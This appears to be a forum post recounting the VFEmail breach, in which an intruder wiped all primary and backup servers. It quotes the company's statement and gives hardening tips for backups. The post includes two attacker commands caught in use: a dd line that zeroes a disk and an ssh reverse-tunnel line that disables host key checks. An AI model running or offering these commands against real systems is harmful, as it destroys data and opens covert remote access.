Email Provider VFEmail Suffers ‘Catastrophic’ Hack
Email provider VFEmail has suffered what the company is calling “catastrophic destruction” at the hands of an as-yet unknown intruder who trashed all of the company’s primary and backup data in the United States. The firm’s founder says he now fears some 18 years’ worth of customer email may be gone forever.
“At this time, the attacker has formatted all the disks on every server,” wrote VFEmail. “Every VM [virtual machine] is lost. Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy.”
Caught the perp in the middle of formatting the backup server: dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
Very sad incident, I hope they recover somehow though the heartless attacker has zeroed out everything. I can't imagine how it would feel if years of my love & labor was lost like this.
And we should all keep some offline rolling snapshots. Or at the very least:
- Use SSH keys instead of passwords.
- Different key(s) for backup server(s)
- Pull from your servers to backup instead of pushing to it.
- Secure that backup like it is worth its weight in gold (because it is).
Stay safe everyone.
Mailcheap.co (Cyberlabs s.r.o. & Cyberlabs Inc.)
Dedicated Email Servers | Complete API support | AI Spam Filtering